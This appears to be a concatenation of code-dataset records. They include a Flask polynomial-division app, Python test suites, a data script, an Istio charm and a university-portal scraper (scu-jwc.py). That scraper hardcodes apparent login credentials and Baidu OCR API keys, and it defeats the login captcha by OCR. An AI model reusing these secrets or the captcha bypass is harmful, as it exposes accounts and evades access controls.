request.form.get(\"second\"):\n return apology(\"must provide the degree of the divisor\")\n \n # extract the degree of the divisor from the request form\n second = int(request.form.get(\"second\"))\n \n # if degrees less than 0, return apology\n if first <= 0:\n return apology(\"must provide positive integers\")\n \n if second <= 0:\n return apology(\"must provide positive integers\")\n \n # if the degree of divisor is greater than the degree of the dividend, return apology\n if second > first:\n return apology(\"the degree of the divisor cannot be greater than the degree of the divisor\")\n \n # store the degrees of both polynomials as session variables\n session[\"first\"] = first\n session[\"second\"] = second\n \n # redirect user to the page where they can input the coefficients of the polynomials\n return redirect(url_for(\"coefficients\"))\n\n@app.route(\"/coefficients\", methods=[\"GET\", \"POST\"])\ndef coefficients():\n \"\"\" Type the coefficients of the dividend and divisor \"\"\"\n \n # extract the degrees of both polynomials\n first = session[\"first\"]\n second = session[\"second\"] \n \n # render the template \"coefficients\"\n if request.method == \"GET\":\n\n return render_template(\"coefficients.html\", first = first, second = second)\n\n if request.method == \"POST\":\n \n # declare the list of coefficients of the dividend and divisor\n dividend = []\n divisor = []\n \n # iterate over the coefficients of the dividend\n for i in range(first+1):\n \n # access the coefficient from the website\n coefficient = request.form.get(str(i))\n\n # if no coefficient provided, return apology\n if not coefficient:\n return apology(\"must provide a coefficient\")\n \n # else append the coefficient to the list of dividend coefficients\n else:\n dividend.append(float(coefficient))\n\n # iterate over the coefficients of the divisor\n for i in range(second+1):\n \n # access the coefficient from the website\n coefficient = request.form.get(\"b\" + str(i))\n\n # if no coefficient provided, return apology\n if not coefficient:\n return apology(\"must provide a coefficient\")\n \n # else append the coefficient to the list of divisor coefficients\n else:\n divisor.append(float(coefficient))\n \n # store the coefficients of the dividend and divisor as session variables\n session[\"dividend\"] = dividend\n session[\"divisor\"] = divisor\n\n # redirect the user to the page where they can see the result of the division\n return redirect(url_for(\"division\"))\n\n@app.route(\"/division\", methods=[\"GET\"])\ndef division():\n \"\"\" Shows the result of the division \"\"\"\n \n # extract the coefficients of the dividend and divisor\n dividend = session[\"dividend\"]\n divisor = session[\"divisor\"]\n \n # perform the division\n result = polynomial(dividend, divisor) \n \n # the function \"polynomial\" returns the list of two elements\n # the first element in this list is the list of quotient coefficients, and the second one is the list of remainder coefficients\n quotient = result[0]\n remainder = result[1]\n \n # render a template with results\n return render_template(\"division.html\", len1 = len(dividend), len2 = len(divisor), len3 = len(quotient), len4 = len(remainder), dividend = dividend, divisor = divisor, quotient = quotient, remainder = remainder)\n\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":6682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"165861340","text":"# -*- coding: utf-8 -*-\n'''\nSmoothtest\nCopyright (c) 2014 Juju. Inc\n\nCode Licensed under MIT License. See LICENSE file.\n'''\nimport unittest\nfrom smoothtest.webunittest.WebdriverManager import WebdriverManager\nfrom smoothtest.Logger import Logger\nfrom smoothtest.webunittest.XpathBrowser import XpathBrowser\nimport os\nfrom contextlib import contextmanager\nfrom smoothtest.settings.default import SINGLE_TEST_LIFE\n\n\nclass WebUnitTestBase(unittest.TestCase):\n\n def _get_local_html_path(self, name):\n return os.path.join(os.path.dirname(__file__), 'html', name)\n\n def _local_path_to_url(self, path):\n return 'file://' + path\n\n def get_local_page(self, path):\n self.browser.get_url(self._local_path_to_url(path))\n\n @contextmanager\n def create_html(self, name, body, jquery=True, **kwargs):\n templ = '''\n\n\n\n {jquery}\n {name}\n\n\n {body}\n\n\n '''\n if jquery:\n jquery = ''\n else:\n jquery = ''\n \n kwargs.update(locals())\n html = templ.format(**kwargs)\n path = self._get_local_html_path(name + '.html')\n with open(path, 'w') as fh:\n fh.write(html)\n try:\n yield path\n except:\n raise\n finally:\n os.remove(path)\n\n def setUp(self):\n self.__level_mngr = WebdriverManager().enter_level(level=SINGLE_TEST_LIFE)\n webdriver = self.__level_mngr.acquire_driver()\n logger = Logger(__name__)\n self.browser = XpathBrowser('', webdriver, logger, settings={})\n\n def tearDown(self):\n self.__level_mngr.exit_level()\n\n\ndef smoke_test_module():\n pass \n\nif __name__ == \"__main__\":\n smoke_test_module()\n","sub_path":"smoothtest/webunittest/tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"525362286","text":"import pytest\nimport asyncio\nfrom aionetworking.formats.contrib.json import JSONObject\nfrom aionetworking.formats.recording import get_recording\nfrom aionetworking.utils import alist\n\n\nclass TestJsonCodec:\n\n @pytest.mark.asyncio\n async def test_00_decode(self, json_codec, json_buffer, decoded_result):\n decoded = await alist(json_codec.decode(json_buffer))\n assert decoded == decoded_result\n\n @pytest.mark.asyncio\n async def test_01_encode(self, json_codec, json_rpc_login_request, json_rpc_login_request_encoded):\n encoded = await json_codec.encode(json_rpc_login_request)\n assert encoded == json_rpc_login_request_encoded\n\n @pytest.mark.asyncio\n async def test_02_decode_buffer(self, json_codec, json_buffer, json_objects, timestamp):\n decoded = await alist(json_codec.decode_buffer(json_buffer, system_timestamp=timestamp))\n assert decoded == json_objects\n\n @pytest.mark.asyncio\n async def test_03_encode_obj(self, json_codec, json_rpc_login_request, json_object, timestamp):\n encoded = await json_codec.encode_obj(json_rpc_login_request, system_timestamp=timestamp)\n assert encoded == json_object\n\n @pytest.mark.asyncio\n async def test_04_from_file_many(self, json_codec, file_containing_multi_json, json_objects, timestamp):\n objects = json_codec.from_file(file_containing_multi_json, system_timestamp=timestamp)\n assert await alist(objects) == json_objects\n\n @pytest.mark.asyncio\n async def test_05_from_file(self, json_codec, file_containing_multi_json, json_object, timestamp):\n obj = await json_codec.one_from_file(file_containing_multi_json, system_timestamp=timestamp)\n assert obj == json_object\n await asyncio.get_event_loop().shutdown_asyncgens()\n\n\nclass TestJsonObject:\n def test_00_get_codec(self, json_buffer, json_codec, context):\n codec = JSONObject.get_codec(json_buffer, context=context)\n assert codec == json_codec\n\n def test_01_properties(self, json_object, timestamp, client_sock, client_sock_str, client_hostname):\n assert json_object.peer == client_sock_str\n assert json_object.address == client_sock[0]\n assert json_object.sender == client_hostname\n assert json_object.uid == 1\n assert json_object.request_id == 1\n assert json_object.timestamp == timestamp\n assert str(json_object) == 'JSON 1'\n\n def test_02_filter(self, json_object):\n assert json_object.filter() is False\n\n def test_03_json_object_with_codec_kwargs(self, json_buffer, json_object_with_codec_kwargs, json_codec_with_kwargs):\n codec = json_object_with_codec_kwargs.get_codec(json_buffer, test_param='abc')\n assert codec == json_codec_with_kwargs\n\n\nclass TestBufferObject:\n @pytest.mark.asyncio\n async def test_00_buffer_recording(self, buffer_codec, json_encoded_multi, json_recording_data, context, timestamp):\n buffer_obj1 = await buffer_codec.encode_obj(json_encoded_multi[0], system_timestamp=timestamp)\n buffer_obj2 = await buffer_codec.encode_obj(json_encoded_multi[1], system_timestamp=timestamp)\n recording = buffer_obj1.encoded + buffer_obj2.encoded\n packets = await alist(get_recording(recording))\n assert packets == json_recording_data\n","sub_path":"tests/test_formats/test_json.py","file_name":"test_json.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"87771438","text":"import sys\r\nimport logging\r\n# logging.basicConfig(format=\" %(message)s\", level=logging.DEBUG)\r\n\r\ntestCases = int(input()) \r\n \r\nfor testCase in range(1, testCases + 1):\r\n\r\n n = int(input())\r\n p = list(map(int, sys.stdin.readline().strip().split())) \r\n a = []; ai = 0;\r\n\r\n logging.debug(\"Case #\" + str(testCase) + \": \") \r\n \r\n logging.debug(\" N: \"+str(n))\r\n logging.debug(\" P: \"+str(p))\r\n \r\n s = sum(p)\r\n while (s > 0):\r\n m = max(p)\r\n i = p.index(m)\r\n s -= 1\r\n p[i] -= 1;\r\n nm = max(p)\r\n\r\n a.append(str(chr(ord('A')+i)))\r\n \r\n logging.debug(\" Removing \"+str(i)+\" (sum = \"+str(s)+\", max = \"+str(nm)+\") AI: \"+str(a[ai])+\" P: \"+str(p))\r\n if ((s > 2) or (s == 1)) and (nm == m):\r\n i = p.index(m)\r\n s -= 1\r\n p[i] -= 1\r\n nm = max(p) \r\n a[ai] += str(chr(ord('A')+int(i)))\r\n logging.debug(\" Also removing \"+str(i)+\" (sum = \"+str(s)+\", max = \"+str(nm)+\") AI: \"+str(a[ai])+\" P: \"+str(p))\r\n \r\n ai += 1\r\n \r\n print(\"Case #\" + str(testCase) + \": \" + \" \".join(a))\r\n \r\n","sub_path":"solutions_5753053697277952_1/Python/SpaceDog/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"549948483","text":"\"\"\"Tests for the models in the ``core`` app of the Marsha project.\"\"\"\nfrom django.core.exceptions import ValidationError\nfrom django.test import TestCase\n\nfrom safedelete.models import SOFT_DELETE_CASCADE\n\nfrom ..factories import PlaylistFactory\n\n\n# We don't enforce arguments documentation in tests\n# pylint: disable=missing-param-doc,missing-type-doc,unused-argument\n\n\nclass PlaylistModelsTestCase(TestCase):\n \"\"\"Test our intentions about the Playlist model.\"\"\"\n\n def test_models_playlist_str(self):\n \"\"\"The str method should display the playlist title and its eventual soft deletion.\"\"\"\n playlist = PlaylistFactory(title=\"ça joue\")\n self.assertEqual(str(playlist), \"ça joue\")\n\n playlist.delete()\n self.assertEqual(str(playlist), \"ça joue [deleted]\")\n\n def test_models_playlist_fields_lti_id_unique(self):\n \"\"\"Playlists should be unique for a given duo: lti_id/playlist.\"\"\"\n playlist = PlaylistFactory()\n\n # A playlist with a different lti_id and the same consumer site can still be created\n PlaylistFactory(consumer_site=playlist.consumer_site)\n\n # A playlist for a different consumer site and the same lti_id can still be created\n PlaylistFactory(lti_id=playlist.lti_id)\n\n # Trying to create a playlist with the same duo lti_id/consumer site should raise a\n # database error\n with self.assertRaises(ValidationError) as context:\n PlaylistFactory(\n lti_id=playlist.lti_id, consumer_site=playlist.consumer_site\n )\n self.assertEqual(\n context.exception.messages,\n [\"Playlist with this Lti id and Consumer site already exists.\"],\n )\n\n # Soft deleted playlists should not count for unicity\n playlist.delete(force_policy=SOFT_DELETE_CASCADE)\n PlaylistFactory(lti_id=playlist.lti_id, consumer_site=playlist.consumer_site)\n","sub_path":"src/backend/marsha/core/tests/test_models_playlist.py","file_name":"test_models_playlist.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"588476168","text":"\n\nfrom xai.brain.wordbase.verbs._date import _DATE\n\n#calss header\nclass _DATING(_DATE, ):\n\tdef __init__(self,): \n\t\t_DATE.__init__(self)\n\t\tself.name = \"DATING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"date\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_dating.py","file_name":"_dating.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"147820612","text":"import urllib.request as ur\nimport matplotlib.pyplot as plt\n# import cStringIO\nimport requests\nimport csv\nfrom PIL import Image\nfrom aip import AipOcr\n\nimport json\n\n\ndef scu_main():\n login_cookies = login()\n xuanke_result(login_cookies)\n look_grade(login_cookies)\n\n\ndef login():\n check_url = \"http://zhjw.scu.edu.cn/j_spring_security_check\"\n headers = { # 请求头请求刷新验证码和发送post时需要使用\n 'Host': 'zhjw.scu.edu.cn',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',\n 'Accept-Encoding': 'gzip, deflate',\n 'Referer': \"http://zhjw.scu.edu.cn/login\",\n 'Connection': 'keep-alive'\n }\n yzm, response = showpicture()\n username = input(\"your user name: \")\n password = input(\"ypur pass word: \")\n data = {\n \"j_username\": \"2017141463014\",\n \"j_password\": \"121694\",\n \"j_captcha\": yzm\n }\n login_cookies = requests.utils.dict_from_cookiejar(response.cookies)\n resp = requests.post(check_url, headers=headers, cookies=login_cookies, data=data)\n print(resp.status_code)\n return login_cookies\n\n\ndef xuanke_result(login_cookies):\n headers = { # 请求头请求刷新验证码和发送post时需要使用\n 'Host': 'zhjw.scu.edu.cn',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',\n 'Accept-Encoding': 'gzip, deflate',\n 'Referer': \"http://zhjw.scu.edu.cn/student/courseSelect/courseSelectResult/index\",\n 'Connection': 'keep-alive'\n # 'Cookie':'selectionBar=1293219; JSESSIONID=bcd-C3VpyAu4E-yypBxIw; SPRING_SECURITY_REMEMBER_ME_COOKIE=NFVSd1R0VktQSUcxMTQ5MmtIQ2FNdz09OmtlMVhUZnFOaEozZWZxbjB3NWhNa1E9PQ'\n }\n xuankeresult_url = 'http://zhjw.scu.edu.cn/student/courseSelect/thisSemesterCurriculum/callback'\n # selectionBar=1293219\n xuanke_cookie = {'selectionBar': '1293219'}\n xuanke_cookie.update(login_cookies)\n resp = requests.get(xuankeresult_url, headers=headers)\n data = json.loads(resp.text)\n courselist = {}\n courselist = data['xkxx'][0]\n itemlist = list(courselist[list(courselist.keys())[0]].keys())\n valuelist = []\n for course in courselist:\n valuelist.append(list(courselist[course].values()))\n with open('course.csv', 'w', encoding=\"gbk\", newline='') as f:\n writer = csv.writer(f)\n writer.writerow(itemlist)\n for course in valuelist:\n writer.writerow(course)\n\n\ndef look_grade(login_cookies):\n grade_headers = {\n 'Host': 'zhjw.scu.edu.cn',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',\n 'Accept-Encoding': 'gzip, deflate',\n 'Referer': \"http://zhjw.scu.edu.cn/student/integratedQuery/scoreQuery/allTermScores/index\",\n 'Connection': 'keep-alive'\n }\n # selectionBar = 125803405\n grade_cookies = {'selectionBar': '125803405'} # 查成绩的selectionBar\n grade_cookies.update((login_cookies))\n grade_url = 'http://zhjw.scu.edu.cn/student/integratedQuery/scoreQuery/allTermScores/data'\n resp = requests.get(grade_url, cookies=grade_cookies, headers=grade_headers)\n data = json.loads(resp.text) # 转化为json对象\n grades = data['list']['records']\n title = ['学期', '课程号', '课序号', '结束时间', '未知', '未知', '未知', '未知', '成绩', '未知', '未知', '课程名', '课程名', '学分', '学时', '类型', '类型',\n '绩点']\n mark = {'A': 4, 'A-': 3.7, 'B+': 3.3, 'B': 3, 'B-': 2.7, 'C+': 2.3, 'C': 2, 'C-': 1.7, 'D+': 1.3, 'D': 1, 'F': 0}\n with open('grade.csv', 'w', encoding=\"gbk\", newline='') as f:\n writer = csv.writer(f)\n writer.writerow(title)\n for grade in grades:\n grade[17] = mark[grade[17]]\n writer.writerow(grade)\n\n\ndef ocrauto():\n App_id = '15506822'\n Api_key = '1o6gogL5H5wkKsUXAAEAdwAI'\n secret_key = 'XG3WacNfn3NoDOd6RwrPz60qChyppI5C'\n client = AipOcr(appId=App_id, apiKey=Api_key, secretKey=secret_key)\n \"\"\" 读取图片 \"\"\"\n with open(\"yzm.png\", 'rb') as fp:\n image = fp.read()\n \"\"\" 如果有可选参数 \"\"\"\n options = {}\n options[\"language_type\"] = \"ENG\"\n options[\"detect_direction\"] = \"false\"\n options[\"detect_language\"] = \"false\"\n options[\"probability\"] = \"true\"\n\n \"\"\" 带参数调用通用文字识别, 图片参数为本地图片 \"\"\"\n result = client.basicGeneral(image, options)\n yzm = result['words_result'][0]['words']\n print(result,yzm)\n return yzm\n\n\ndef showpicture():\n yzm_url = 'http://zhjw.scu.edu.cn/img/captcha.jpg'\n response = requests.get(yzm_url)\n with open(\"yzm.png\", \"wb\") as f:\n f.write(response.content)\n \"\"\"\n img = Image.open('yzm.png')\n plt.figure(\"yzm\")\n plt.imshow(img)\n plt.show()\n yzm = input(\"请输入验证码: \")\n \"\"\"\n yzm = ocrauto()\n return (yzm, response)\n\n\nif __name__ == '__main__':\n scu_main()\n","sub_path":"scu-jwc.py","file_name":"scu-jwc.py","file_ext":"py","file_size_in_byte":5524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"487043465","text":"'''\nCompute IMERG accumulated precipitation for RRA domain.\n'''\nimport os\nimport util as ut\nimport util_imerg as utimerg\nimport time\nimport h5py as h5py\nimport numpy as np\n\nINITIME = '20181110000000'\nENDTIME = '20181111000000'\nACUM = 3600 #period of accumulation in seconds\nDATAFREQ = 1800 #frequency of files in seconds\nDOMAIN = 'RRA'\n\n# --------------------------------------------------------- #\nbasedir = '/home/paula.maldonado/datosalertar1/RRA_VERIF'\nDATADIR = basedir + '/data/imerg_raw'\n\nstart = time.time()\n\n#Get a list of files to calculate accumulation \nfilelist = utimerg.get_files(DATADIR, INITIME, ENDTIME, ACUM, DATAFREQ)\n\nfor key in filelist.keys():\n print('Accumulation time: ', key) \n acum_pp = 0\n\n # Compute accumulate\n for ifile, filepath in enumerate(filelist[key]):\n lats, lons, precip = utimerg.read_imerg_pp(filepath, limits=[-37.95, -26.05, -65.95, -57.05]) \n lon, lat = np.float32(np.meshgrid(lons, lats))\n acum_pp += precip\n\n # Write data to npz file\n pathout = basedir + '/data/imerg_' + DOMAIN + '_' + str(int(ACUM/3600)) + 'hr_accumulated'\n os.makedirs(pathout, exist_ok=True)\n fileout = pathout + '/' + key\n np.savez(fileout, lat=lat, lon=lon, pp=acum_pp)\n\nend = time.time()\n\nprint('')\nprint('It took ', end-start, ' seconds')\n\n","sub_path":"python/others/compute_imerg_acum.py","file_name":"compute_imerg_acum.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"285423257","text":"from django.conf.urls import patterns, url\nfrom .views import qunit_views, qunit_tests_list_json, settings_json\n\n\n# Add registered qunit tests\nurlpatterns = patterns('',\n *(\n url(r'^jstest/%s' % name, qunit_view, name='jstest_%s' % name)\n for name, qunit_view in qunit_views.iteritems()\n )\n)\n\nurlpatterns += patterns('', \n url(r'^jstest_list', qunit_tests_list_json),\n url(r'^api/settings.json', settings_json, name='settings_json'),\n)\n","sub_path":"geotrek/common/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"68879358","text":"import os\nfrom pathlib import Path\nfrom subprocess import run\n\nfrom charms import layer\nfrom charms.reactive import clear_flag, hook, set_flag, when, when_any, when_not\n\n\n@hook(\"upgrade-charm\")\ndef upgrade_charm():\n clear_flag(\"charm.started\")\n\n\n@when(\"charm.started\")\ndef charm_ready():\n layer.status.active(\"\")\n\n\n@when_any(\n \"layer.docker-resource.mixer-image.changed\",\n \"layer.docker-resource.proxy-image.changed\",\n)\ndef update_image():\n clear_flag(\"charm.started\")\n\n\n@when(\n \"layer.docker-resource.mixer-image.available\",\n \"layer.docker-resource.proxy-image.available\",\n)\n@when_not(\"charm.started\")\ndef start_charm():\n layer.status.maintenance(\"configuring container\")\n\n mixer_image = layer.docker_resource.get_info(\"mixer-image\")\n proxy_image = layer.docker_resource.get_info(\"proxy-image\")\n\n model = os.environ[\"JUJU_MODEL_NAME\"]\n\n run(\n [\n \"openssl\",\n \"req\",\n \"-x509\",\n \"-newkey\",\n \"rsa:4096\",\n \"-keyout\",\n \"key.pem\",\n \"-out\",\n \"cert.pem\",\n \"-days\",\n \"365\",\n \"-subj\",\n \"/CN=localhost\",\n \"-nodes\",\n ],\n check=True,\n )\n\n layer.caas_base.pod_spec_set(\n {\n \"version\": 2,\n \"containers\": [\n {\n \"name\": \"mixer\",\n \"args\": [\n \"--monitoringPort=15014\",\n \"--address\",\n \"unix:///sock/mixer.socket\",\n \"--log_output_level=default:info\",\n f\"--configStoreURL=mcp://istio-galley.{model}.svc:9901\",\n \"--certFile=/etc/certs/cert-chain.pem\",\n \"--keyFile=/etc/certs/key.pem\",\n \"--caCertFile=/etc/certs/root-cert.pem\",\n f\"--configDefaultNamespace={model}\",\n \"--useAdapterCRDs=false\",\n \"--trace_zipkin_url=http://zipkin:9411/api/v1/spans\",\n \"--averageLatencyThreshold\",\n \"100ms\",\n \"--loadsheddingMode\",\n \"enforce\",\n ],\n \"imageDetails\": {\n \"imagePath\": mixer_image.registry_path,\n \"username\": mixer_image.username,\n \"password\": mixer_image.password,\n },\n \"config\": {\"GODEBUG\": \"gctrace=1\", \"GOMAXPROCS\": \"6\"},\n \"ports\": [\n {\"name\": \"port-1\", \"containerPort\": 15014},\n {\"name\": \"port-2\", \"containerPort\": 42422},\n ],\n \"files\": [\n {\n \"name\": \"istio-certs\",\n \"mountPath\": \"/etc/certs\",\n \"files\": {\n \"cert-chain.pem\": Path(\"cert.pem\").read_text(),\n \"key.pem\": Path(\"key.pem\").read_text(),\n },\n },\n # {\n # \"name\": \"telemetry-adapter-secret\",\n # \"mountPath\": \"/var/run/secrets/istio.io/telemetry/adapter\",\n # \"files\": {},\n # },\n ],\n },\n {\n \"name\": \"proxy\",\n \"args\": [\n \"proxy\",\n \"--domain\",\n f\"{model}.svc.cluster.local\",\n \"--serviceCluster\",\n \"istio-telemetry\",\n \"--templateFile\",\n \"/etc/istio/proxy/envoy_telemetry.yaml.tmpl\",\n \"--controlPlaneAuthPolicy\",\n \"NONE\",\n ],\n \"imageDetails\": {\n \"imagePath\": proxy_image.registry_path,\n \"username\": proxy_image.username,\n \"password\": proxy_image.password,\n },\n \"config\": {\n \"POD_NAME\": {\"field\": {\"path\": \"metadata.name\", \"api-version\": \"v1\"}},\n \"POD_NAMESPACE\": model,\n \"INSTANCE_IP\": {\n \"field\": {\"path\": \"status.PodIP\", \"api-version\": \"v1\"}\n },\n \"SDS_ENABLED\": False,\n },\n \"ports\": [\n {\"name\": \"port-3\", \"containerPort\": 9091},\n {\"name\": \"port-4\", \"containerPort\": 15004},\n # {\n # \"name\": \"http-envoy-prom\",\n # \"containerPort\": 15090,\n # \"protocol\": \"TCP\",\n # },\n ],\n \"files\": [\n {\n \"name\": \"istio-certs2\",\n \"mountPath\": \"/etc/certs\",\n \"files\": {\n \"cert-chain.pem\": Path(\"cert.pem\").read_text(),\n \"key.pem\": Path(\"key.pem\").read_text(),\n },\n }\n ],\n },\n ],\n }\n )\n\n layer.status.maintenance(\"creating container\")\n set_flag(\"charm.started\")\n","sub_path":"charms/istio-telemetry/reactive/charm.py","file_name":"charm.py","file_ext":"py","file_size_in_byte":5615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"436955554","text":"import sys\nfrom xml.dom.minidom import parse\nimport time\nimport matrixops\n\n\ndom = parse(sys.argv[1])\nkol = 0\nflag = 0\ndom = dom.childNodes[0]\nfor child in dom.childNodes:\n if child.nodeType == dom.ELEMENT_NODE:\n if child.nodeName == \"net\":\n kol += 1\n else:\n if flag == 0:\n matr = [] # исходная таблица сопротивлений между узлами\n for j in range(kol):\n matr1 = []\n for i in range(kol):\n if i != j:\n # инициализация таблицы значениями inf\n matr1.append(float(\"+inf\")) \n else:\n matr1.append(0) # 0 на главной диагонале\n matr.append(matr1)\n flag=1\n \n atts = child.attributes\n if child.nodeName == \"diode\":\n res1 = float(\"+inf\")\n res2 = float(\"+inf\")\n for k, v in atts.items():\n if k == \"net_from\":\n i = int(v) - 1\n elif k == \"net_to\":\n j = int(v) - 1\n elif k == \"resistance\":\n res1 = float(v)\n else:\n res2 = float(v)\n # обработка деления на 0 \n if 1 / res1 + 1 / matr[i][j] == 0 or 1 / res2 + 1 / matr[i][j] == 0:\n matr[i][j] = float(\"+inf\")\n matr[j][i] = float(\"+inf\")\n else:\n matr[i][j] = 1 / (1 / res1 + 1 / matr[i][j])\n matr[j][i] = 1 / (1 / res2 + 1 / matr[j][i])\n else: # \"resistor\" и \"capactor\"\n res = float(\"+inf\")\n for k, v in atts.items():\n if k == \"net_from\":\n i = int(v) - 1\n elif k == \"net_to\":\n j = int(v) - 1\n else:\n res = float(v)\n if 1 / res + 1 / matr[i][j] == 0:\n matr[i][j] = float(\"+inf\")\n matr[j][i] = float(\"+inf\")\n else:\n matr[i][j] = 1 / (1 / res + 1 / matr[i][j])\n matr[j][i] = matr[i][j]\nmatr_cxx = []\nstart_cxx = time.time()\nmatr_cxx = matrixops.f_w_algorithm(matr)\nfinish_cxx= time.time()\nprint(start_cxx)\nprint(finish_cxx)\nstart_py = time.time() \n# рассчет сопртивлений по алгоритму Флойда-Уоршела\nfor k in range(len(matr)):\n for i in range(len(matr)):\n for j in range(len(matr)):\n if matr[i][j] == 0:\n a = float(\"+inf\")\n else:\n a = 1 / matr[i][j]\n if matr[i][k] == 0 and matr[k][j] == 0:\n b = float(\"+inf\")\n else:\n b = 1 / (matr[i][k] + matr[k][j])\n if a + b == 0:\n matr[i][j] = float(\"+inf\")\n else:\n matr[i][j] = 1 / (a + b)\nfinish_py = time.time()\n \n# запись таблицы в файл\nwith open(sys.argv[2],\"w\") as fd:\n for i in range(len(matr)):\n for j in range(len(matr)):\n if j != len(matr) - 1:\n fd.write(str(round(matr[i][j]- matr_cxx[i][j],6)) + ', ')\n else:\n fd.write(str(round(matr[i][j] - matr_cxx[i][j],6)) + \"\\n\")\n \n# запись таблицы в файл\nwith open(sys.argv[3],\"w\") as fd:\n for i in range(len(matr_cxx)):\n for j in range(len(matr_cxx)):\n if j != len(matr_cxx) - 1:\n fd.write(str(round(matr_cxx[i][j],6)) + ', ')\n else:\n fd.write(str(round(matr_cxx[i][j],6)) + \"\\n\")\n \nprint((finish_py - start_py)/(finish_cxx - start_cxx)) # время работы программы\n\n\n\n \n","sub_path":"compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"382625066","text":"from deck import *\nimport unittest\n\nclass TestDeckModule(unittest.TestCase):\n\t\t\n\tdef setUp(self):\n\t\t# count of deck\n\t\tself.deckCount = 2\n\t\t# 2-10 + JQKA, with faces CDHS\n\t\tself.cardCount = (9 + 4) * 4 * self.deckCount\n\t\t# deck for test\n\t\tself.deck = Deck(self.deckCount)\n\t\n\tdef test_cardCount(self):\n\t\tself.assertEqual(len(self.deck.cards), self.cardCount)\n\t\n\tdef test_next(self):\n\t\tfor index in range(self.cardCount):\n\t\t\tcard = self.deck.cards[self.cardCount - index - 1]\n\t\t\tself.assertEqual(self.deck.next(), card)\n\nif __name__=='__main__':\n\tunittest.main()","sub_path":"Session 3.1/deck_test.py","file_name":"deck_test.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"467652010","text":"#!/usr/bin/python2\n# -*- coding: utf8 -*-\n\nimport os\n\nfrom PyQt4 import QtGui, QtCore\n\nfrom GUI.SplitPane import SplitPane\nfrom GUI.Controller import Controller\nfrom GUI.LightPanel import AddLightPanel,RemoveLightPanel\nfrom GUI.AlgoPanel import AlgoPanel\n\n\nclass MainWindow(QtGui.QMainWindow):\n \"\"\" This class is the GUI's main class \"\"\"\n def __init__(self):\n \"\"\"Constructor of the class MainWindow\"\"\"\n super(MainWindow, self).__init__()\n # The GUI controller\n self._controller = Controller(self)\n # init the GUI\n self.initUI()\n \n def initUI(self): \n \"\"\" This methode will initiate the GUI :\n - The Menu bar\n - The toorls bar\n - The main SplitPane\n - The statusBar \n \"\"\" \n # Windows title\n self.setWindowTitle(\"Les ombres au sein des jeux et des animations\")\n\n self._statusBar = self.statusBar()\n self._statusBar.showMessage('Welcome!')\n self._controller.initStatusBar(self._statusBar)\n\n ex = SplitPane(self._controller)\n self.setCentralWidget(ex)\n\n self.initToolsBar()\n self.initMenu()\n \n self.showMaximized()\n\n def closeApp(self):\n \"\"\" \"\"\"\n self.close()\n self._controller.killThreads()\n #exit()\n #os.system(\"kill -9 \" + os.getpid()) # hihi\n\n def displayHelp(self):\n \"\"\" \"\"\"\n QtGui.QMessageBox.information(self, \"Aide\", \"Pour utiliser le programme, veuillez choisir une scene dans la vue en arbre de gauche et un algorithme compatible.\")\n\n def displayAbout(self):\n \"\"\" Display some info\"\"\"\n QtGui.QMessageBox.information(self, \"A propos\", \"Printemps des sciences 2015\" + \"\\n\\n\" + \"Pierre Gerard, Bruno Rocha Pereira, Antoine Carpentier\" + \"\\n\\n\" + \"Dans ce projet nous examinons le domaine des algorithmes de rendu d'ombre et nous en comparerons quelques-uns dans un environnement de simulation 3D comme le OpenGL. Le but est de tester leurs aspects positifs et négatifs et de voir les conditions dans lesquelles ils donnent le meilleur rendu.\")\n\n def initMenu(self):\n \"\"\" This method will initate the menu \"\"\"\n menubar = self.menuBar()\n fileMenu = menubar.addMenu('&Fichier')\n helpMenu = menubar.addMenu(\"&Aide\")\n\n exitAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" + 